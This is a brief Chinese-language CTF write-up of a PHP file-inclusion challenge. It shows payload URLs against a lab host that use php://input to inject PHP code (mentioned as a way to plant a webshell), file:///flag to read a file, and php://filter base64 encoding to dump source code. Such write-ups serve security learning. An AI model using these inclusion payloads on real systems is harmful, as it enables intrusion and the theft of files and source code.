主要是利用file协议和php协议,算是内网渗透?
打开后发现一个超链接
点击后发现url行为file=show.php
可能是通过file来包含并读取文件
这种题有一个思路是可以用php://input的方法传入木马,然后连接的
可以在url行传一个
1 | http://114.67.246.176:15309/index.php?file=php://input |
然后在post行传
1 | <?php phpinfo(); ?> |
就可以看php的配置了,然后根据配置来判断可以使用什么协议
这才是真正用来学习的题,不过被禁掉了,这道题的学习意义就降了不少
只能盲注了,可以通过file协议,然后盲猜文件名为/flag
然后传值http://114.67.246.176:15309/index.php?file=file:///flag
得到flag
file:///是协议头
也可以通过php://filter的方法:php://filter/read=convert.base64-encode/resource=[文件名],作用是读取文件源码
所以传值http://114.67.246.176:15309/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
得到一些base64编码的内容
解码后得到源代码——
内容如下:
1 | <html> |
得到flag
顺便发现确实对input过滤了